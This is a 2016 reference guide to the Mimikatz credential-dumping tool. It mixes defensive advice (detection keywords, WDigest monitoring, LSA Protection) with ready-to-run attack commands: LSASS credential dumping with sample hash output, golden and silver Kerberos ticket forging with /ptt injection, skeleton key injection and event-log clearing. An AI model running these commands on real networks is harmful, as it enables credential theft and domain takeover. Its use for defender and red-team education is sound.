Mimikatz

Unofficial Guide to Mimikatz & Command Reference

Mimikatz Command Reference Version: Mimikatz 2.1 alpha 20160506 (oe.eo) edition [05/06/2016]
Page last updated: 5/05/2016

Introduction:

It seems like many people on both sides of the fence, Red & Blue, aren’t familiar with most of Mimikatz’s capabilities, so I put together this information on all the available commands I could find. I plan to update as I can with additional content about the most useful commands. This way both Red & Blue teams better understand the full capability and are better able to secure the enterprises they are hired to protect.

I developed this reference after speaking with a lot of people, hired to both defend and attack networks, I learned that outside of a few of the mot frequently used Mimikatz commands, not many knew about the full capability of Mimikatz. This page details as best as possible what each command is, how it works, the rights required to run it, the parameters (required & optional), as well as screenshots and additional context (where possible). There are several I haven’t delved fully into, but expect to in the near future. While I will continue to post articles to ADSecurity.org about different aspects of Mimikatz usage, I plan to keep this as updated and as comprehensive as possible.

This information is provided to help organizations better understand Mimikatz capability and is not to be used for unlawful activity. Do NOT use Mimikatz on computers you don’t own or have been allowed/approved to. In other words, don’t pen-test/red-team systems with Mimikatz without a “get out of jail free card”.

This page and all content contained within is not to be reproduced in whole or part without express written consent by this page’s author.
I did not write Mimikatz and therefore have no special insight. All of the information on this page is derived from using Mimikatz, reading the source code, conversations with Benjamin, his blog & GitHub pages, and my own work/research.
Any errors on this page are my own only. Send comments/kudus here.

Many thanks to Benjamin Delpy for writing and continuously updating Mimikatz. His work has greatly improved the security of Windows, especially Windows 10.

 

Mimikatz Overview:

Mimikatz is one of the best tools to gather credential data from Windows systems. In fact I consider Mimikatz to be the “Swiss army knife” (or multi-tool) of Windows credentials – that one tool that can do everything. Since the author of Mimikatz, Benjamin Delpy, is French most of the resources describing Mimikatz usage is in French, at least on his blog. The Mimikatz GitHub repository is in English and includes useful information on command usage.

Mimikatz is a Windows x32/x64 program coded in C by Benjamin Delpy (@gentilkiwi) in 2007 to learn more about Windows credentials (and as a Proof of Concept). There are two optional components that provide additional features, mimidrv (driver to interact with the Windows kernal) and mimilib (AppLocker bypass, Auth package/SSP, password filter, and sekurlsa for WinDBG). Mimikatz requires administrator or SYSTEM and often debug rights in order to perform certain actions and interact with the LSASS process (depending on the action requested). The Mimikatz.exe contains, or at least should contain, all capability noted there.

Mimikatz capability can be leveraged by compiling and running your own version, running the Mimikatz executable, leveraging the MetaSploit script, the official Invoke-Mimikatz PowerShell version, or one of the dozen of Mimikatz PowerShell variants (I happen to be partial to PowerShell Empire, because Empire is awesome!).

The Mimikatz source code and release binaries are available on GitHub and is licensed under Creative Commons with the following detail:
You are free to:
*  Share — copy and redistribute the material in any medium or format
*  Adapt — remix, transform, and build upon the material
*  for any purpose, even commercially.
The licensor cannot revoke these freedoms as long as you follow the license terms.
Attribution — You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use.
No additional restrictions — You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.

Mimikatz Author(s):

  • Benjamin DELPY gentilkiwi, you can contact him on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )
  • DCSync function in lsadump module was co-written with Vincent LE TOUX, you contact him by mail ( vincent.letoux [at] gmail.com ) or visit his website ( http://www.mysmartlogon.com )


“Official” Mimikatz Links:

Mimikatz GitHub Location (Source Code)

Mimikatz Releases (includes binaries)

Mimikatz GitHub Wiki (Documentation, some of which is reproduced here)

GentilKiwi Blog (much of it is in French, use Chrome/other for translation)

 

Mimikatz & Credentials:

After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. This is meant to facilitate single sign-on (SSO) ensuring a user isn’t prompted each time resource access is requested. The credential data may include Kerberos tickets, NTLM password hashes, LM password hashes (if the password is <15 characters, depending on Windows OS version and patch level), and even clear-text passwords (to support WDigest and SSP authentication among others. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled):

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest “UseLogonCredential”(DWORD)

WDIGEST-RegistryKey-UseLogonCredential-1

This registry key is worth monitoring in your environment since an attacker may wish to set it to 1 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2. Windows 8.1/2012 R2 and newer do not have a “UseLogonCredential” DWORD value, so it would have to be created. The existence of this key on these systems may indicate a problem.

Note that running code directly on a target system is rarely desirable for an attacker, so Mimikatz is continuously updated with new capability to be run remotely. This include running Mimikatz remotely against a remote system to dump credentials, using Invoke-Mimikatz remotely with PowerShell Remoting, and DCSync, the latest feature to grab password data for any Active Directory account in the domain remotely against a DC without any Mimikatz code being run on the DC (it uses Microsoft’s Domain Controller official replication APIs, once the correct rights are attained).

 

Available Credentials by OS:

Benjamin Delpy posted an Excel chart on OneDrive (shown below) that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms reducing the amount and type of credentials kept in memory.
Delpy-CredentialDataChart
(Click image to embiggen)

 

PowerShell & Mimikatz:

The majority of Mimikatz functionality is available in PowerSploit (PowerShell Post-Exploitation Framework) through the “Invoke-Mimikatz” PowerShell script (written by Joseph Bialek) which “leverages Mimikatz 2.0 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in memory. This allows you to do things such as dump credentials without ever writing the Mimikatz binary to disk.” Note that the PowerSploit framework is now hosted in the “PowerShellMafia” GitHub repository.

What gives Invoke-Mimikatz its “magic” is the ability to reflectively load the Mimikatz DLL (embedded in the script) into memory. The Invoke-Mimikatz code can be downloaded from the Internet (or intranet server), and executed from memory without anything touching disk. Furthermore, if Invoke-Mimikatz is run with the appropriate rights and the target computer has PowerShell Remoting enabled, it can pull credentials from other systems, as well as execute the standard Mimikatz commands remotely, without files being dropped on the remote system.

Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date.

  • Use mimikatz to dump credentials out of LSASS:  Invoke-Mimikatz -DumpCreds
  • Use mimikatz to export all private certificates (even if they are marked non-exportable): Invoke-Mimikatz –DumpCerts
  • Elevate privilege to have debug rights on remote computer: Invoke-Mimikatz -Command “privilege::debug exit” -ComputerName “computer1”

The Invoke-Mimikatz “Command” parameter enables Invoke-Mimikatz to run custom Mimikatz commands.

Defenders should expect that any functionality included in Mimikatz is available in Invoke-Mimikatz.

 

Detecting Mimikatz:

There are several ways to potentially detect Mimikatz use on a network, though none are guaranteed. Since Mimikatz’s source code is on GitHub, anyone with Visual Studio can compile their own version. I built my own version of Mimikatz called “kitikatz” by replacing all instances of “mimikatz” with “kitikatz” and the detection rate at VirusTotal was not good (4/54). Windows Defender on my Windows 10 system detected it.  I then replaced “Benjamin Delpy” and “gentilkiwi” with the same words, just replacing the e’s with 3’s and the i’s with 1’s. The detection rate was still poor (4/54). Windows Defender on my Windows 10 system did not detect it. So, your mileage will vary regarding detection. While VirusTotal is not the best method to determine AV detection, it is a relatively simple method to get some basic numbers.

  • Benjamin Delpy publishes YARA rules for Mimikatz on the Mimkatz GitHub repository.
  • Run AntiVirus software with the latest definition files. According to VirusTotal, the mimikatz.exe dated 11/11/2015 (32bit & 64bit) is detected by 35/35 of the AV engines. Renaming the file doesn’t change the scan results. Note that Benjamin has noted real-world results to be less successful. However, AV will usually flag the known bad files. AntiVirus is part of foundational security – the first layer in “defense in depth”.
  • Mimikatz (as of October) activates attached BusyLights. [implemented in Mimikatz version 2.0 alpha 20151008 (oe.eo) edition]
  • Leverage security software to identify processes that interact with LSASS. Security software that monitors for process injection may also be able to regularly detect Mimikatz use.
  • HoneyTokens/HoneyHashes involves placing special credentials in memory on a number of computers in the enterprise. These credentials are flagged so when anyone attempts to use them, a critical alert goes out. this requires some sort of push method as well as placing credentials that are attractive to an attacker. In theory, this could detect credential theft and use in the environment.
  • If the WDIGEST registry key (HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest) is supposed to be set to “0” in the enterprise to prevent “clear-text” passwords from being stored in LSASS and there are systems where it was switched to “1”, this may be indicative of credential theft activity. This registry key is worth monitoring in your environment since an attacker may wish to set it to 0 to enable Digest password support which forces “clear-text” passwords to be placed in LSASS on any version of Windows from Windows 7/2008R2 up to Windows 10/2012R2 (probably 2016 as well).
  • Forged Kerberos ticket detection is covered on this page I published in early 2015. These methods can detect Golden Tickets, Silver Tickets, and Trust Tickets. I also have information on how to detect MS14-068 Kerberos vulnerability exploitation.
  • Enable LSA Protection on all Windows versions in the enterprise that supports it. This prevents Mimikatz from working “out-of-the-box” and requires use of the Mimikatz driver which logs events when it interacts with LSASS.
  • There are new/updated events starting with Windows 10 and Windows Server 2016 to potentially detect Mimikatz use:

Added a default process SACL to LSASS.exe
In Windows 10, a default process SACL was added to LSASS.exe to log processes attempting to access LSASS.exe. The SACL is L”S:(AU;SAFA;0x0010;;;WD)”. You can enable this under Advanced Audit Policy Configuration\Object Access\Audit Kernel Object.
This can help identify attacks that steal credentials from the memory of a process.

 

Mimikatz & LSA Protection:

Windows Server 2012 R2 and Windows 8.1 includes a new feature called LSA Protection which involves enabling LSASS as a protected process on Windows Server 2012 R2 (Mimikatz can bypass with a driver, but that should make some noise in the event logs):

The LSA, which includes the Local Security Authority Server Service (LSASS) process, validates users for local and remote sign-ins and enforces local security policies. The Windows 8.1 operating system provides additional protection for the LSA to prevent reading memory and code injection by non-protected processes. This provides added security for the credentials that the LSA stores and manages.

Enabling LSA protection:

  1. Open the Registry Editor (RegEdit.exe), and navigate to the registry key that is located at: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa and Set the value of the registry key to: “RunAsPPL”=dword:00000001.
  2. Create a new GPO and browse to Computer Configuration, Preferences, Windows Settings. Right-click Registry, point to New, and then click Registry Item. The New Registry Properties dialog box appears. In the Hive list, click HKEY_LOCAL_MACHINE. In the Key Path list, browse to SYSTEM\CurrentControlSet\Control\Lsa.  In the Value name box, type RunAsPPL. In the Value type box, click the REG_DWORD. In the Value data box, type 00000001.Click OK.

LSA Protection prevents non-protected processes from interacting with LSASS. Mimikatz can still bypass this with a driver (“!+”).

Mimikatz-Driver-Remove-LSASS-Protection

 

Detecting Invoke-Mimikatz:

  • Ensure all Windows systems have PowerShell v3 or newer. Newer versions of PowerShell have better logging features, especially PowerShell v5.
  • Enable PowerShell Module Logging via Group Policy: Computer Configuration, Policies, Administrative Templates, Windows Components, and Windows PowerShell,Turn on Module Logging. Enter “*” and click OK. This will log all PowerShell activity including all PowerShell modules.

PowerShellModuleLogging-All

  • PowerShell activity will be logged to the PowerShell Operational Log. Push or pull these events to a central logging server (via Windows Event Forwarding or similar) or SIEM.
  • Parse PowerShell events for the following:
    • “System.Reflection.AssemblyName”
    • “System.Reflection.Emit.AssemblyBuilderAccess “
    • “System.Runtime.InteropServices.MarshalAsAttribute”
    • “TOKEN_PRIVILEGES”
    •  “SE_PRIVILEGE_ENABLED“

Note: While it may be possible to identify Mimikatz usage by alerting on “mimikatz”, “Delpy”, or “gentilkiwi”, a “sophisticated” attacker will likely roll their own version of Mimikatz or Invoke-Mimikatz without these keywords.

 

Detecting Offensive PowerShell Tools:

Many PowerShell offensive tools use the following calls which are logged in PowerShell Module Logging.

  • “GetDelegateForFunctionPointer”
  • “System.Reflection.AssemblyName“
  • “System.Reflection.Emit.AssemblyBuilderAccess“
  • “System.Management.Automation.WindowsErrorReporting”
  • “MiniDumpWriteDump”
  • “TOKEN_IMPERSONATE”
  • “TOKEN_DUPLICATE”
  • “TOKEN_ADJUST_PRIVILEGES”
  • “TOKEN_PRIVILEGES”

 

“Sneaky” Mimikatz Execution:

Casey Smith (@subtee & blog) has done a LOT of work showing how application whitelisting is not the panacea many believe it to be. Despite that, application whitelisting is a solid layer in a defense in depth strategy.
Casey also has come up with many creative and sneaky ways to execute Mimikatz.

Most Popular Mimikatz Commands:

Here are just some of the most popular Mimikatz command and related functionality.

  • CRYPTO::Certificates – list/export certificates
  • KERBEROS::Golden – create golden/silver/trust tickets
  • KERBEROS::List – List all user tickets (TGT and TGS) in user memory. No special privileges required since it only displays the current user’s tickets.Similar to functionality of “klist”.
  • KERBEROS::PTT – pass the ticket. Typically used to inject a stolen or forged Kerberos ticket (golden/silver/trust).
  • LSADUMP::DCSync – ask a DC to synchronize an object (get password data for account). No need to run code on DC.
  • LSADUMP::LSA – Ask LSA Server to retrieve SAM/AD enterprise (normal, patch on the fly or inject). Use to dump all Active Directory domain credentials from a Domain Controller or lsass.dmp dump file. Also used to get specific account credential such as krbtgt with the parameter /name: “/name:krbtgt”
  • LSADUMP::SAM – get the SysKey to decrypt SAM entries (from registry or hive). The SAM option connects to the local Security Account Manager (SAM) database and dumps credentials for local accounts. This is used to dump all local credentials on a Windows computer.
  • LSADUMP::Trust – Ask LSA Server to retrieve Trust Auth Information (normal or patch on the fly). Dumps trust keys (passwords) for all associated trusts (domain/forest).
  • MISC::AddSid – Add to SIDHistory to user account. The first value is the target account and the second value is the account/group name(s) (or SID). Moved to SID:modify as of May 6th, 2016.
  • MISC::MemSSP – Inject a malicious Windows SSP to log locally authenticated credentials.
  • MISC::Skeleton – Inject Skeleton Key into LSASS process on Domain Controller. This enables all user authentication to the Skeleton Key patched DC to use a “master password” (aka Skeleton Keys) as well as their usual password.
  • PRIVILEGE::Debug – get debug rights (this or Local System rights is required for many Mimikatz commands).
  • SEKURLSA::Ekeys – list Kerberos encryption keys
  • SEKURLSA::Kerberos – List Kerberos credentials for all authenticated users (including services and computer account)
  • SEKURLSA::Krbtgt – get Domain Kerberos service account (KRBTGT)password data
  • SEKURLSA::LogonPasswords – lists all available provider credentials. This usually shows recently logged on user and computer credentials.
  • SEKURLSA::Pth – Pass- theHash and Over-Pass-the-Hash
  • SEKURLSA::Tickets – Lists all available Kerberos tickets for all recently authenticated users, including services running under the context of a user account and the local computer’s AD computer account. Unlike kerberos::list, sekurlsa uses memory reading and is not subject to key export restrictions. sekurlsa can access tickets of others sessions (users).
  • TOKEN::List – list all tokens of the system
  • TOKEN::Elevate – impersonate a token. Used to elevate permissions to SYSTEM (default) or find a domain admin token on the box
  • TOKEN::Elevate /domainadmin – impersonate a token with Domain Admin credentials.

 

ADSecurity Mimikatz Posts:

All posts mentioning Mimikatz: ADSecurity.org Mimikatz Posts

 

Mimikatz Command Guide:

Mimikatz can be executed in interactive mode by simply running “Mimikatz.exe” or pass it a command and exit (example: ‘Mimikatz “kerberos::list” exit’). Invoke-Mimikatz does not have an interactive mode.

Mimikatz can be used to pass commands from the command line to Mimikatz for processing in order which is useful for Invoke-Mimikatz or when using Mimikatz in scripts. Appending “exit” exits Mimikatz after the last command is executed (do this so Mimikatz exits gracefully).

PS C:\temp\mimikatz> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit
.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
 '#####'                                     with 17 modules * * */
mimikatz(commandline) # privilege::debug
 Privilege '20' OK
mimikatz(commandline) # sekurlsa::logonpasswords
Authentication Id : 0 ; 646260 (00000000:0009dc74)
 Session           : RemoteInteractive from 2
 User Name         : adsadministrator
 Domain            : ADSECLAB
 Logon Server      : ADSDC03
 Logon Time        : 11/27/2015 11:41:27 AM
 SID               : S-1-5-21-1581655573-3923512380-696647894-500
 msv :
 [00000003] Primary
 * Username : ADSAdministrator
 * Domain   : ADSECLAB
 * NTLM     : 5164b7a0fda365d56739954bbbc23835
 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f
 [00010000] CredentialKeys
 * NTLM     : 5164b7a0fda365d56739954bbbc23835
 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f
 tspkg :
 wdigest :
 * Username : ADSAdministrator
 * Domain   : ADSECLAB
 * Password : (null)
 kerberos :
 * Username : adsadministrator
 * Domain   : LAB.ADSECURITY.ORG
 * Password : (null)
 ssp :   KO

 

The interactive mode provides a “Mimikatz console” where commands can be entered and executed in real-time:

PS C:\temp\mimikatz> .\mimikatz
.#####.   mimikatz 2.0 alpha (x64) release "Kiwi en C" (Nov 13 2015 00:44:32)
 .## ^ ##.
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
 '#####'                                     with 17 modules * * */
mimikatz # privilege::debug
 Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 646260 (00000000:0009dc74)
 Session           : RemoteInteractive from 2
 User Name         : adsadministrator
 Domain            : ADSECLAB
 Logon Server      : ADSDC03
 Logon Time        : 11/27/2015 11:41:27 AM
 SID               : S-1-5-21-1581655573-3923512380-696647894-500
 msv :
 [00000003] Primary
 * Username : ADSAdministrator
 * Domain   : ADSECLAB
 * NTLM     : 5164b7a0fda365d56739954bbbc23835
 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f
 [00010000] CredentialKeys
 * NTLM     : 5164b7a0fda365d56739954bbbc23835
 * SHA1     : f8db297cb2ae403f8915675cebe79643d0d3b09f
 tspkg :
 wdigest :
 * Username : ADSAdministrator
 * Domain   : ADSECLAB
 * Password : (null)
 kerberos :
 * Username : adsadministrator
 * Domain   : LAB.ADSECURITY.ORG
 * Password : (null)
 ssp :   KO
 credman :

Mimikatz Command Reference:

Mimikatz Version History

Mimikatz Modules:

NOTE: Any item marked “experimental” should only be used in test environments.


BUSYLIGHT

The BUSYLIGHT Mimikatz module provides additional information for and control of connected BusyLights.

BUSYLIGHT::List

BUSYLIGHT::Off

BUSYLIGHT::Single

BUSYLIGHT::Status

BUSYLIGHT::Test

 

CRYPTO

The CRYPTO Mimikatz module provides advanced capability to interface with Windows cryptographic functions (CryptoAPI).
Typical use is to export certificates that aren’t marked as “exportable.”

CRYPTO::CAPI– (experimental) Patch CryptoAPI layer for easy export

Mimikatz-Crypto-CAPI

CRYPTO::Certificates – list/export certificates

Carlos Perez (aka DarkOperator) has a great blog post on using Mimikatz to export certificates.
This command lists certificates and properties of theirs keys. It can export certificates too. Typically requires “privilege::debug”

  • /systemstore – optional – the system store that must be used (default: CERT_SYSTEM_STORE_CURRENT_USER)
  • /store – optional – the store that must be used to list/export certificates (default: My) – full list with crypto::stores
  • /export – optional – export all certificates to files (public parts in DER, private parts in PFX files – password protected with: mimikatz)

Benjamin’s comments on CRYPTO:Certificates:

  • See crypto::stores for valid systemstore list, and its output for store list.
  • Non exportable keys (with KO - ERROR kuhl_m_crypto_exportCert ; Export / CreateFile (0x8009000b)) can often be exported with crypto::capi and/or crypto::cng
  • Despite crypto::capi or crypto::cng patch, you must have correct ACL on filesystem to access private keys (UAC… :wink:)
  • Some smartcard crypto providers can report a successfull private export (it’s not, of course :wink:)

 

CRYPTO::CNG – (experimental) Patch CNG service for easy export (patches “KeyIso” service)

CRYPTO::Hash – hash a password (with optional user name)

CRYPTO::Keys– list/export keys containers

CRYPTO::Providers – list cryptographic providers

Mimikatz-Crypto-Providers

CRYPTO::Stores – list cryptographic stores

  • /systemstore – optional – the system store that must be used to list stores (default: CERT_SYSTEM_STORE_CURRENT_USER)

Store Options:
CERT_SYSTEM_STORE_CURRENT_USER or CURRENT_USER
CERT_SYSTEM_STORE_CURRENT_USER_GROUP_POLICY or USER_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE or LOCAL_MACHINE
CERT_SYSTEM_STORE_LOCAL_MACHINE_GROUP_POLICY or LOCAL_MACHINE_GROUP_POLICY
CERT_SYSTEM_STORE_LOCAL_MACHINE_ENTERPRISE or LOCAL_MACHINE_ENTERPRISE
CERT_SYSTEM_STORE_CURRENT_SERVICE or CURRENT_SERVICE
CERT_SYSTEM_STORE_USERS or USERS
CERT_SYSTEM_STORE_SERVICES or SERVICES

Mimikatz-Crypto-Stores

CRYPTO::System – provide Windows system certificate file path or registry hive.

 

DPAPI

The DPAPI Mimikatz module provides capability to extract Windows stored (and protected) credential data using DPAPI.  DPAPI is the official Windows method to protect (encrypt) local data (usually passwords).

Starting with Microsoft® Windows® 2000, the operating system began to provide a data protection application-programming interface (API). This Data Protection API (DPAPI) is a pair of function calls that provide operating system-level data protection services to user and system processes. By operating system-level, we mean a service that is provided by the operating system itself and does not require any additional libraries. By data protection, we mean a service that provides confidentiality of data by using encryption. Because data protection is part of the operating system, every application can now secure data without needing any specific cryptographic code other than the necessary function calls to DPAPI. These calls are two simple functions with various options to modify DPAPI behavior. Overall, DPAPI is an easy-to-use service that will benefit developers who must provide protection for sensitive application data, such as passwords and private keys.

DPAPI is a password-based data protection service. It requires a password to provide protection. The drawback, of course, is that all protection provided by DPAPI rests on the password provided. This is offset by DPAPI using proven cryptographic routines, specifically the strong Triple-DES algorithm, and strong keys, which we’ll cover in more detail later. Because DPAPI is focused on providing protection for users and requires a password to provide this protection, it logically uses the user’s logon password for protection.

There has been some work done previously regarding attacking DPAPI:

Benjamin Delpy has an Excel spreadsheet on OneDrive which lists Windows locations that may have stored credentials – view the spreadsheet online.

DPAPI::Blob – Unprotect a DPAPI blob with API or Masterkey

DPAPI:Cache

DPAPI::CAPI – CAPI key test

DPAPI::CNG – CNG key test

DPAPI::Cred – CRE test

DPAPI::CredHist – Configure a Credhist file

DPAPI::MasterKey – Configure a Masterkey file, unprotect (key depending)

DPAPI::Protect – Protect data using DPAPI

DPAPI::Vault – VAULT test

DPAPI::WIFI – WIFI test (XML profile required – reference Ben’s spreadsheet)

DPAPI::WWAN – WWAN test (XML profile required – reference Ben’s spreadsheet)

 

EVENT

EVENT::Clear – Clear an event log

Mimikatz-Event-Clear

EVENT:::Drop – (experimental) Patch Events service to avoid new events

Mimikatz-Event-Drop

KERBEROS

The KERBEROS Mimikatz module is used to interface with the official Microsoft Kerberos API.
No special rights are required for the commands in this module.

KERBEROS::Ask – request TGS tickets

Mimikatz-Kerberos-Ask

KERBEROS::Clist – list tickets in MIT/Heimdall ccache

KERBEROS::Golden – create golden/silver/trust tickets
The capability of this command is based on the password hash type retrieved.

Type Requirement Scope
Golden KRBTGT hash Domain/Forest
Silver Service hash Service
Trust Trust hash Domain/Forest -> Domain/Forest
(based on account access)

Golden Ticket

A Golden Ticket is a TGT using the KRBTGT NTLM password hash to encrypt and sign.

A Golden Ticket (GT) can be created to impersonate any user (real or imagined) in the domain as a member of any group in the domain (providing a virtually unlimited amount of rights) to any and every resource in the domain. Since the Golden Ticket is an authentication ticket (TGT described below), its scope is the entire domain (and the AD forest by leveraging SID History) since the TGT is used to get service tickets (TGS) used to access resources. The Golden Ticket (TGT) contains user group membership information (PAC) and is signed and encrypted using the domain’s Kerberos service account (KRBTGT) which can only be opened and read by the KRBTGT account.

To summarize, once an attacker gets access to the KRBTGT password hash, they can create Golden Tickets (TGT) that provide access to anything in AD at any time.

Mimikatz Golden Ticket Command Reference:

The Mimikatz command to create a golden ticket is “kerberos::golden”

  • /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
  • /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.
  • /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.
  • /user – username to impersonate
  • /groups (optional) – group RIDs the user is a member of (the first is the primary group).
    Add user or computer account RIDs to receive the same access.
    Default Groups: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
  • /krbtgt – NTLM password hash for the domain KDC service account (KRBTGT). Used to encrypt and sign the TGT.
  • /ticket (optional) – provide a path and name for saving the Golden Ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
  • /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
  • /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).
  • /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
  • /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
  • /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).
  • /sids (optional) – set to be the SID of the Enterprise Admins group in the AD forest ([ADRootDomainSID]-519) to spoof Enterprise Admin rights throughout the AD forest (AD admin in every domain in the AD Forest).
  • /aes128 – the AES128 key
  • /aes256 – the AES256 key

Golden Ticket Default Groups:

  • Domain Users SID: S-1-5-21<DOMAINID>-513
  • Domain Admins SID: S-1-5-21<DOMAINID>-512
  • Schema Admins SID: S-1-5-21<DOMAINID>-518
  • Enterprise Admins SID: S-1-5-21<DOMAINID>-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)
  • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520

kerberos::golden /admin:ADMIINACCOUNTNAME /domain:DOMAINFQDN /id:ACCOUNTRID /sid:DOMAINSID /krbtgt:KRBTGTPASSWORDHASH /ptt

Command Example:
.\mimikatz “kerberos::golden /admin:DarthVader /domain:rd.lab.adsecurity.org /id:9999 /sid:S-1-5-21-135380161-102191138-581311202 /krbtgt:13026055d01f235d67634e109da03321 /startoffset:0 /endin:600 /renewmax:10080 /ptt” exit

Mimikatz-CreateGoldenTicket-DarthVader2

Golden Ticket References:

* Golden Tickets are now More Golden (with SID History)

Update1/5/2016:
In early January 2015, I shared with customers indicators for detecting forged Kerberos tickets and subsequently presented this information at BSides Charm 2015. Soon after, Mimikatz was updated with a domain field that was set to static values, usually containing the string “eo.oe”. As of the Mimikatz update dated 1/5/2016, forged Kerberos tickets no longer include a domain anomaly since the netbios domain name is placed in the domain component of the Kerberos ticket.

Mimikatz code diff:
GT-DomainFieldUpdate-20150105

More information on the difficulty of detecting forged Kerberos tickets (Golden Tickets, Silver Tickets, etc) in the in the Detecting Forged Kerberos Tickets section.

 

Silver Ticket

A Silver Ticket is a TGS (similar to TGT in format) using the target service account’s (identified by SPN mapping) NTLM password hash to encrypt and sign.
The Mimikatz command to create a silver ticket is “kerberos::golden”.

Mimikatz Silver Ticket Command Reference:

  • /domain – the fully qualified domain name. In this example: “lab.adsecurity.org”.
  • /sid – the SID of the domain. In this example: “S-1-5-21-1473643419-774954089-2222329127”.
  • /sids – Additional SIDs for accounts/groups in the AD forest with rights you want the ticket to spoof. Typically, this will be the Enterprise Admins group for the root domain  “S-1-5-21-1473643419-774954089-5872329127-519”. This parameter adds the provided SIDs to the SID History parameter.
  • /user – username to impersonate
  • /groups (optional) – group RIDs the user is a member of (the first is the primary group)
    default: 513,512,520,518,519 for the well-known Administrator’s groups (listed below).
  • /ticket (optional) – provide a path and name for saving the forged ticket file to for later use or use /ptt to immediately inject the golden ticket into memory for use.
  • /ptt – as an alternate to /ticket – use this to immediately inject the forged ticket into memory for use.
  • /id (optional) – user RID. Mimikatz default is 500 (the default Administrator account RID).
  • /startoffset (optional) – the start offset when the ticket is available (generally set to –10 or 0 if this option is used). Mimikatz Default value is 0.
  • /endin (optional) – ticket lifetime. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 10 hours (600 minutes).
  • /renewmax (optional) – maximum ticket lifetime with renewal. Mimikatz Default value is 10 years (~5,262,480 minutes). Active Directory default Kerberos policy setting is 7 days (10,080 minutes).
  • /aes128 – the AES128 key
  • /aes256 – the AES256 key

Silver Ticket Required Parameters:

  • /target – the target server’s FQDN.
  • /service – the kerberos service running on the target server. This is the Service Principal Name class (or type) such as cifs, http, mssql.
  • /rc4 – the NTLM hash for the service (computer account or user account)

Silver Ticket Default Groups:

  • Domain Users SID: S-1-5-21<DOMAINID>-513
  • Domain Admins SID: S-1-5-21<DOMAINID>-512
  • Schema Admins SID: S-1-5-21<DOMAINID>-518
  • Enterprise Admins SID: S-1-5-21<DOMAINID>-519  (this is only effective when the forged ticket is created in the Forest root domain, though add using /sids parameter for AD forest admin rights)
  • Group Policy Creator Owners SID: S-1-5-21<DOMAINID>-520

 

Example Mimikatz Command to Create a Silver Ticket:

The following Mimikatz command creates a Silver Ticket for the CIFS service on the server adsmswin2k8r2.lab.adsecurity.org. In order for this Silver Ticket to be successfully created, the AD computer account password hash for adsmswin2k8r2.lab.adsecurity.org needs to be discovered, either from an AD domain dump or by running Mimikatz on the local system as shown above (Mimikatz “privilege::debug” “sekurlsa::logonpasswords” exit). The NTLM password hash is used with the /rc4 paramteer. The service SPN type also needs to be identified in the /service parameter. Finally, the target computer’s fully-qualified domain name needs to be provided in the /target parameter. Don’t forget the domain SID in the /sid parameter.

mimikatz “kerberos::golden /admin:LukeSkywalker /id:1106 /domain:lab.adsecurity.org /sid:S-1-5-21-1473643419-774954089-2222329127 /target:adsmswin2k8r2.lab.adsecurity.org /rc4:d7e2b80507ea074ad59f152a1ba20458 /service:cifs /ptt” exit

SilverTicketUsage-MemberServer-CIFS-AdminShare2

